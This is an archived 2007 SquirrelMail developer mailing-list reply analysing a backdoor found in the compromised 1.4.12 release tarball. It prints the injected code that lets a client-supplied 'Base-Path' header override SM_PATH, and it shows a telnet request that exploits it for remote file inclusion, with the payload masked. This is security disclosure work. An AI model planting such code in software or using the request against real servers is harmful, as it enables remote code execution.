Home
Reading
Searching
Subscribe
Sponsors
Statistics
Posting
Contact
Spam
Lists
Links
About
Hosting
Filtering
Features Download
Marketing
Archives
FAQ
Blog
 
Gmane
From: Uwe Schindler <thetaphi <at> php.net>
Subject: Re: SECURITY: 1.4.12 Package Compromise
Newsgroups: gmane.mail.squirrelmail.devel
Date: Friday 14th December 2007 16:55:28 UTC (over 9 years ago)
Hallo Jon,

If found your announcement in a newsticker (heise online) today.

> Further investigations show that the modifications to the code should
> have little to no impact at this time.  Modifications seemed to be
> based around a PHP global variable which we cannot track down.  The
> changes made will most likely generate an error, rather than a
> compromise of a system in the event the code does get executed.

Diffing the the compromised source and the orginal source I found out that
there was the following code added to the source tarball:

/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
    define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}

This is really a important security issue! By first looking on it, you will
think there is no standard variable named "'HTTP_BASE_PATH" -- so no
problem! - that's true, but you should know, how HTTP_XXX variables are
generated by webservers.

This variables come from the original CGI specs
(http://hoohoo.ncsa.uiuc.edu/cgi/env.html):
"In addition to these,
the header lines received from the client, if any, are placed into
the environment with the prefix HTTP_ followed by the header name.
Any - characters in the header name are changed to _ characters. The
server may exclude any headers which it has already processed, such
as Authorization, Content-type, and Content-length. If necessary, the
server may choose to exclude any or all of these headers if including
them would exceed any system environment limits."

Apache or other webservers mostly do not run PHP as CGI but PHP works
according to the CGI specs. This is where variables like HTTP_USER_AGENT or
HTTP_HOST or HTTP_COOKIE come from. They are not explicitely generated by
the webserver, they are sent by the client as HTTP headers and transformed
to environment variables in a way, the CGI spec specifies (in PHP they are
copied to $_SERVER).

By this you can change the constant "SM_PATH" by issuing a HTTP request
e.g.
with telnet:

> telnet www.example.org 80
GET / HTTP/1.1
Connection: close
User-Agent: test/1.0
Base-Path: ************************

Where *********** could for example be a remote URL! Which leads to remote
code execution. So this is a very serious security flaw tarned very good!
It
seems that you can modify an internal constant of Squirrel that is
important
and used in all includes:

e.g.:
require_once(SM_PATH . 'config/config.php');

P.S.: You can test this with a simple phpinfo() page and requesting it with
telnet/netcat with custom headers, like I done.

-----
Uwe Schindler
[email protected] - http://www.php.net
NSAPI SAPI developer
Bremen, Germany



-------------------------------------------------------------------------
SF.Net email is sponsored by:
Check out the new SourceForge.net Marketplace.
It's the best place to buy or sell services
for just about anything Open Source.
http://ad.doubleclick.net/clk;164216239;13503038;w?http://sf.net/marketplace
-----
squirrelmail-devel mailing list
Posting guidelines: http://squirrelmail.org/postingguidelines
List address: [email protected]
List archives: http://news.gmane.org/gmane.mail.squirrelmail.devel
List info (subscribe/unsubscribe/change options): https://lists.sourceforge.net/lists/listinfo/squirrelmail-devel
 
CD: 4ms